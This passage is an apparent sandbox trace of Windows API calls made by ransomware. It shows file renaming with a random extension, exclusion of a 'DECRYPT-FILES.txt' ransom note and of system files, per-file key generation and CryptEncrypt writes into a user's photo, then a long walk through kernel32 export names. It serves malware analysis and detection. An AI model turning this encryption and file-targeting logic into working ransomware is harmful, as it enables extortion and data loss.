halpmcxz\\appdata\\roaming\\rvu8epgxop9r2.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3.bfWPTNS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rvu8epgxop9r2.mp3.bfwptns"), dwFlags=0x0) returned 1 [0082.465] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.466] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.466] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.466] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6699d1f0, ftCreationTime.dwHighDateTime=0x1d4cebb, ftLastAccessTime.dwLowDateTime=0x1b380d60, ftLastAccessTime.dwHighDateTime=0x1d4c701, ftLastWriteTime.dwLowDateTime=0x1b380d60, ftLastWriteTime.dwHighDateTime=0x1d4c701, nFileSizeHigh=0x0, nFileSizeLow=0x9893, dwReserved0=0x0, dwReserved1=0x0, cFileName="uKAYm0ioy0dRtlDj-.jpg", cAlternateFileName="UKAYM0~1.JPG")) returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="DECRYPT-FILES.txt") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="autorun.inf") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="boot.ini") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="desktop.ini") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="ntuser.dat") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="iconcache.db") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="bootsect.bak") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="ntuser.dat.log") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="thumbs.db") returned 1 [0082.466] lstrcmpiW (lpString1="uKAYm0ioy0dRtlDj-.jpg", lpString2="Bootfont.bin") returned 1 [0082.466] lstrlenW (lpString="uKAYm0ioy0dRtlDj-.jpg") returned 21 [0082.466] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0082.466] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0082.466] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0082.466] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0082.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.467] lstrlenW (lpString="uKAYm0ioy0dRtlDj-.jpg") returned 21 [0082.467] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="uKAYm0ioy0dRtlDj-.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg" [0082.467] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uKAYm0ioy0dRtlDj-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ukaym0ioy0drtldj-.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.467] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=39059) returned 1 [0082.467] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.467] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.467] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.467] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.467] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.468] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.468] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.469] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.469] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.470] CloseHandle (hObject=0x444) returned 1 [0082.470] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.470] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.470] CloseHandle (hObject=0x0) returned 0 [0082.471] CloseHandle (hObject=0x440) returned 1 [0082.474] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.474] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.474] GetTickCount () returned 0x114d182 [0082.474] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.475] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.475] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.475] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.475] lstrlenA (lpString="kernel32.dll") returned 12 [0082.475] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.475] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.475] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.475] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.475] lstrlenA (lpString="ADDATOMA") returned 8 [0082.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.475] lstrlenA (lpString="ADDATOMW") returned 8 [0082.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.476] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.476] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.476] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.476] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.476] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.476] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.476] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.476] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.476] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.476] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.476] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.476] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.476] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.476] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.476] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.476] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.476] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.476] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.477] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.477] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.477] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.477] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.477] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.477] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.477] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.477] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.477] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.477] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.477] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.477] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.477] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.477] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.477] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.477] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.477] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.477] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.477] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.478] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.478] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.478] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.478] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.478] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.478] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.478] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.478] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.478] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.478] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.478] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.478] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.478] lstrlenA (lpString="BEEP") returned 4 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.478] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.478] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.478] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.478] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.478] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.479] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.479] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.479] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.479] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.479] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.479] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.479] lstrlenA (lpString="CANCELIO") returned 8 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.479] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.479] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.479] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.479] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.479] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.479] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.479] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.479] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.479] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.479] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.479] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.480] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.480] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.480] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.480] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.480] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.480] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.480] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.480] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.480] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.480] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.480] lstrlenA (lpString="CLOSETHREADPOOLIO") 